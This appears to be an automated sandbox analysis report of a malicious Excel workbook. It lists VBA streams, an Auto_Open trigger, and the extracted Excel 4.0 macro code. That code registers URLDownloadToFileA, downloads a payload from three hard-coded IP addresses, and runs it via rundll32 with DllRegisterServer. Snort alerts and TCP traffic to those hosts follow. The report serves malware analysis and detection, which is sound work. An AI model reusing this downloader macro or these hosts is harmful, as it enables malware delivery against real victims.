                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Briks"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Kikide"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vrest
                                                                                                                                                VBA File Name:Vrest.bas
                                                                                                                                                Stream Size:679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                "Vrest"
                                                                                                                                                VB_Name
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vsewd
                                                                                                                                                VBA File Name:Vsewd.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                "Vsewd"
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:856
                                                                                                                                                Entropy:5.31019504221
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:209
                                                                                                                                                Entropy:3.32661660177
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:97
                                                                                                                                                Entropy:3.61064918306
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:266
                                                                                                                                                Entropy:4.62034133633
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/f
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:38
                                                                                                                                                Entropy:1.54052096453
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/o
                                                                                                                                                File Type:empty
                                                                                                                                                Stream Size:0
                                                                                                                                                Entropy:0.0
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:
                                                                                                                                                Data Raw:
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4263
                                                                                                                                                Entropy:4.38205341073
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1024
                                                                                                                                                Entropy:6.73319737871
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                05/04/21-18:03:07.648273TCP1201ATTACK-RESPONSES 403 Forbidden804916591.211.91.81192.168.2.22
                                                                                                                                                05/04/21-18:03:08.391246TCP1201ATTACK-RESPONSES 403 Forbidden80491665.34.179.36192.168.2.22
                                                                                                                                                05/04/21-18:03:08.599534TCP1201ATTACK-RESPONSES 403 Forbidden804916745.153.229.23192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 18:09:08.326652050 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:09:08.411031008 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:09:08.411175013 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:09:08.411722898 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:09:08.495264053 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:09:08.562383890 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:09:08.562585115 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:09:08.567625046 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:09:08.712661982 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:09:08.712794065 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:09:08.775371075 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:09:08.920556068 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:09:09.321224928 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:09:09.321399927 CEST4971180192.168.2.55.34.179.36
